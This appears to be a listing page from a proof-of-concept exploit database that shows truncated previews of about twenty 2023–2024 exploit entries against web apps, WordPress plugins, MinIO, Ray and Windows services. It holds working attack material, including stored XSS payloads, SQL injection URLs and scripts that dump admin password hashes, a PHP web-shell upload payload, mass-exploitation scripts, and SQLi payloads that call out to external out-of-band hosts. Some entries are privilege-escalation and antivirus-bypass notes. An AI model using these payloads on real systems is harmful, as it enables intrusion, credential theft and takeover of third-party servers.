?day POC 漏洞数据库

# Exploit Title: HTMLy Version v2.9.6 - Stored XSS # Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/ # Version 3.10.8.21 # Date : 04/08/2024 1 ) Login admin https://127.0.0.1/HTMLy/admin/config 2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see XSS alert

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) # Description: # The Ray Project dashboard contains a CPU profiling page, and the format parameter is # not validated before being inserted into a system command executed in a shell, allowing # for arbitrary command execution. If the system is configured to allow passwordless sudo # (a setup some Ray configurations require) this will result in a root shell being returned # to the user. If not configured, a user level shell will be returned # Version: <= 2.6.3 # Date: 2024-4-10 # Exploit Author: Fire_Wolf # Tested on: Ubuntu 20.04.6 LTS # Vendor Homepage: https://www.ray.io/ # Software Link: https…

# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path # Google Dork: null # Date: 4/10/2024 # Exploit Author: Joseph Kwabena Fiagbor # Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ # Software Link: # Version: v.1.23.0.02 # Tested on: windows 7-11 # CVE : CVE-2024-31804 1. Description: The Terratec dmx_6fire usb installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof > C:\Users\Astra>sc qc "ttdmx6firesvc" > {SC] QueryServiceConfig SUCCES…

# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation # Date: 2024-04-11 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z # Tested on: Windows 10 # CVE : CVE-2024-24747 # Required before execution: pip install minio,requests import argparse import datetime import traceback import urllib from xml.dom.minidom import parseString import requests import json import base64 from minio.credentials import Credentials from minio.signer import sign_v4_s3 class CVE_2024_24747: new_buckets = [] old_buckets = [] def __init__(self, h…

# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi # Author : Onur Karasalihoğlu # Date : 27/02/2024 # Sample Usage % python3 omos_sqli_exploit.py https://target.com Available Databases: 1. information_schema 2. omosdb Please select a database to use (enter number): 2 You selected: omosdb Extracted Admin Users Data: 1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin 2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith ''' import requests import re import sys def fetch_database_names(domain): url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JS…

# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload # Date: 2024-02-04 # Exploit Author: Georgios Tsimpidas # Vendor Homepage: https://www.openeclass.org/ # Software Link: https://download.openeclass.org/files/3.15/ # Version: 3.15 (2024) # Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1) # CVE : CVE-2024-31777 # GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File import requests import argparse import zipfile import os import sys RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ <?php if(isset($_REQUEST['cmd']))…

# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi # Date: February 25th, 2024 # Exploit Author: Stefan Hesselman # Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ # Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Kali Linux # CVE: N/A # CWE: CWE-89, CWE-74 ## Description Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database. ## Vul…

## Title: Human Resource Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/02/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The cityedit parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+' was submitted in the cityedit parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that refe…

# Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass # Author: LiquidWorm # Vendor: Positron srl # Product web page: https://www.positron.it # https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ # Affected version: 1.20 # TRA7K5_REV107 # TRA7K5_REV106 # TRA7K5_REV104 # TRA7K5_REV102 # # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to # guarantee an excellent quality-price ratio in compliance with current regulations and # intended for individual broadcasters or radio networks. All m…

## Title: Best Student Result Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/08/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The nid parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that r…

# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload # Date: 2024-04-01 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys import os.path import requests import re import urllib3 from requests.exceptions import SSLError from multiprocessing.dummy import Pool as ThreadPool from colorama import Fore, init init(autoreset=True) error_color = Fore.RED info_color = Fore.CYAN success_color = Fore.GREEN highlight_color = Fore.MAGENTA requests.urllib3.disable_warnings() headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozi…

# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.3.1 # Proof Of Concept: 1. Click Add New Watermark and enter the XSS payload into the Watermark Text. 2. Stored XSS will run on anyone who wants to edit this page. # Vulnerable Property: watermark_title # PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp # Request: POST /wp-admin/post.php HTTP/2 Host: erdemstar.local Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22…

# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path # Date: 2024-04-01 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 7.0.15 # Tested on: Windows 10 Pro x64 1. Description: The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof C:\>sc qc anydesk [SC] QueryServiceConfig SUCCESS SERVIC…

# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi # Author: nu11secur1ty # Date: 03/28/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 # Reference: https://portswigger.net/web-security/sql-injection # Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL o…

# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2024-04-01 # Vendor : https://www.eset.com # Version : 17.0.16.0 # Tested on OS: Microsoft Windows 10 pro x64 C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET Security\ekrn.exe C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_N…

# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------17447595573126883634155…

# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting # Date: 2023-09-25 # Exploit Author: Vinnie McRae - RedTeamer IT Security # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.7) and older version of Axigen WebMail # Tested on: firefox, chrome # CVE: CVE-2023-48974 Description The `serverName_input` parameter is vulnerable to stored cross-site scripting (XSS) due to unsanitized or unfiltered processing. This means that an attacker can inject malicious code into this parameter, which will then be executed by other users when they view the page where the parameter is used. This is af…

# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF # Application: Casdoor # Version: <= 1.331.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Tested on: Windows # CVE : CVE-2023-34927 Overview ================================================== Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. Proof of Concept ================================================== Made an…

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" erro…

# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 2024-02-25 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re , json from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,app…

# Exploit Title: Smart School 6.4.1 - SQL Injection # Exploit Author: CraCkEr # Date: 28/09/2023 # Vendor: QDocs - qdocs.net # Vendor Homepage: https://smart-school.in/ # Software Link: https://demo.smart-school.in/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-5495 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's re…

## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ## EXPLOIT : import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CG…

# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerabili…

#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders #Open Burp Suite. #In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. #Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. #Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. #On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": #code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# #Press "Replace URL" on the Replace URL page. Burp Suite should …

# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-t…